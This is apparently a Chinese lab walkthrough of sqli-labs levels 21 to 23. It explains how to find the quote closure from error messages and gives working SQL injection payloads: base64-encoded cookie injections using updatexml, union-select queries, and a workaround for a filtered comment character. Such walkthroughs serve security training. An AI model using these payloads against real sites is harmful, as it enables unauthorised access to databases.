-
Less-21
输入admin 1成功登录后显示http信息 根据提示对Cookie进行注入,输入都无果,看到YWRtaW4=并不是我们输入的admin,但是发现后面后有=,为base64编码特征,解码后发现为admin, 思路:输入1'进行编码,MSc= 出现错误 MySQL server version for the right syntax to use near ''1'') LIMIT 0,1' at line 1 闭合为')采用报错注入 MScpIG9yIHVwZGF0ZXhtbCgxLGNvbmNhdCgweDdlLGRhdGFiYXNlKCkpLDEpLS0gLQ== base64编码地址:https://c.runoob.com/front-end/693/
-
Less-22
与上一题一样,采用base64编码 输入1"即MSI=报错 MySQL server version for the right syntax to use near '"1"" LIMIT 0,1' at line 1 闭合为",采用报错注入 MSIgb3IgdXBkYXRleG1sKDEsY29uY2F0KDB4N2UsZGF0YWJhc2UoKSksMSktLSAt
-
Less-23
这一关又回到了get请求 输入?id=1'报错 MySQL server version for the right syntax to use near ''1'' LIMIT 0,1' at line 1 闭合为 ' 但是将前面的单引号闭合之后,后面的单引号注释不掉,输入注释符显示 MySQL server version for the right syntax to use near '' LIMIT 0,1' at line 1 这里猜测注释符被过滤掉了,查看源码也验证了这一点 order by也不能使用了,所以只能用-1 union select 1,2,3 or '1'='1不断加数字来获得显示位,为3是成功显示 在显示位2可以进行查询 ?id=-1' union select 1,database(),3 or '1'='1 这里也可以使用报错注入 ?id=1' or updatexml(1,concat(0x7e,database()),1) or '1'='1